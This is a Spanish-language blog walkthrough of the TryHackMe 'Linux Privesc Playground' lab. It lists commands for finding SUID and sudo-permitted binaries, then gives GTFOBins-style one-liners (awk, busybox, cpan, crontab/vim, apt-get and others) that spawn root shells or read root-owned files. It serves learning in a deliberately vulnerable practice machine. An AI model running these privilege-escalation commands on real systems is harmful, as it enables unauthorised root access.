This page looks best with JavaScript enabled

TryHackMe - Linux Privesc Playground

 ·  ☕ 2 min read  ·  ✍️ sckull

Linux Privesc Playground es una maquina de TryHackMe aqui encontrarás la solucion para escalar privilegios de distintas formas.

Informacion de la Maquina

Titulo Linux Privesc Playground
Info A linux privilege escalation playground, filled with badly configured superuser permissions, incorrectly set SUID bits, and more!
Puntos 358
Dificultad Relativamente Facil
Maker SherlockSec

Linux Privesc Playground, contiene ficheros del tipo SUID los cuales al ejecutarlos, se obtiene permisos del usuario quien creo este fichero unicamente durante la ejecucion.

Las credenciales de la maquina:

1
SSH Credentials - user:password

image

Para poder enumerar los ficheros del tipo SUID podemos utilizar los siguientes comandos:

1
2
3
find / -perm -4000 2> /dev/null | xargs ls -lah

find / -perm -u=s -type f 2>/dev/null

De igual forma podemos utilizar sudo para poder ver que ficheros pueden ser ejecutados bajo el comando sudo.

1
sudo -l -l

Podemos ver que nos devuelve una lista de ficheros los cuales pueden ser utilizados para obtener privilegios de root.

A continuacion se listan la solucion para alguno de ellos, se puede encontrar los comandos en la pagina GTFOBINS.

/bin/apt-get*

En el caso de este fichero al consultar sobre la existencia en el directorio que nos muestra el listado no existe en esa direccion. Utilizamos cp para copiar el acrhivo y lo colocamos en la direccion /bin/.

Comando:

1
sudo /bin/apt-get update -o APT::Update::Pre-Invoke::= /bin/bash

image

/usr/bin/aria2c

Ya que podemos ejecutar este archivo con el comando sudo, podemos aprovechar las diferentes opciones que tiene el archivo. aria2c en su version 1.13.0.

Comando:

1
sudo /usr/bin/aria2c -i /root/flag.txt

image

/usr/sbin/arp

Comando:

1
LFILE=/root/flag.txt; sudo arp -v -f "$LFILE"

image

/bin/ash

Comando:

1
sudo /bin/ash

image

/usr/bin/awk

Comando:

1
sudo awk 'BEGIN {system("/bin/sh")}'

image

/usr/bin/base64

Comando:

1
2
LFILE=/root/flag.txt
sudo base64 "$LFILE" | base64 --decode

image

/bin/bash

Comando:

1
sudo bash

image

/bin/busybox

Comando:

1
sudo busybox sh

image

/bin/cat

Comando:

1
sudo /bin/cat /root/flag.txt

image

/bin/chmod

Comando:

1
2
LFILE=/root/flag.txt
sudo chmod 0777 $LFILE

image

/bin/chown

Comando:

1
2
LFILE=/root/flag.txt
sudo /bin/chown $(id -un):$(id -gn) $LFILE

image

/bin/cp

Comando:

1
2
3
4
FLAG=/tmp/flag.txt
TF=/root/flag.txt
sudo /bin/cp $TF $FLAG
cat $FLAG

image

/usr/bin/cpan

Comando:

1
sudo cpan

Elegimos no a las opciones hasta CPAN site, entonces ‘Autoconfiguration complete.’ y escribimos el siguiente comando:

1
! exec '/bin/bash'

image

/bin/crontab

Comando:

1
sudo /bin/crontab -e

Seleccionamos el editor Vim, presionamos ESC y escribimos :!sh.

![image](/images/posts/thm/LPP/Peek 2019-12-10 00-51.gif)

/usr/bin/cut

Comando:

1
2
LFILE=/root/flag.txt
sudo cut -d "" -f1 "$LFILE"

image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

THM: Linux Privesc Playground